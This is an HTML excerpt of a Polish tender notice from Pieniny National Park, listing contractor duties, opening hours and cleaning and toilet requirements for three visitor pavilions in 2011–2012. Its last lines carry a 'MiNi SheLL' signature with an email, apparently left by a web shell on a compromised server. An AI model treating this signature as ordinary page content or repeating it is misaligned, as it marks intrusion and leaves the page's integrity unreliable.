<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych, utrzymanie porządku i czystości w pawilonie i jego otoczeniu oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.10.2011r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków
- maj 		10.00 - 17.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 17.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień 	10.00 - 15.00 z wyjątkiem poniedziałków
- październik 	10.00 - 15.00 z wyjątkiem poniedziałków
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przy ogródku roślin pienińskich, droga przed pawilonem) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- utrzymanie w należytym stanie ogródka roślin pienińskich,
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej, utrzymanie porządku i czystości w pawilonie i jego otoczeniu oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.10.2011r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków 
- maj 		10.00 - 15.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 15.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień	10.00 - 15.00 z wyjątkiem poniedziałków
- październik 	10.00 - 15.00 z wyjątkiem poniedziałków
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadania w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przed pawilonem, droga przed pawilonem) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań
- zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Szczawnicy, utrzymanie porządku i czystości w pawilonie, jego otoczeniu i wzdłuż drogi pienińskiej oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.03.2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków
- maj 		10.00 - 17.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 17.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień 	10.00 - 16.00 z wyjątkiem poniedziałków
- październik 	10.00 - 16.00 z wyjątkiem poniedziałków
- listopad		 nieczynne
- grudzień	10.00 - 15.00 z wyjątkiem poniedziałków
- styczeń	10.00 - 15.00 z wyjątkiem poniedziałków
- luty		10.00 - 15.00 z wyjątkiem poniedziałków
- marzec		10.00 - 15.00 z wyjątkiem poniedziałków
Ponadto nieczynne 1.01, 25 - 26. 12 oraz w Święta Wielkanocne
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu oraz wzdłuż Drogi Pienińskiej (na odległość do 10 m na skarpie i po lustro wody na Dunajcu) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- utrzymanie w należytym stanie zieleni wokół pawilonu,
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli za wyjątkiem pomieszczenia służbowego,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com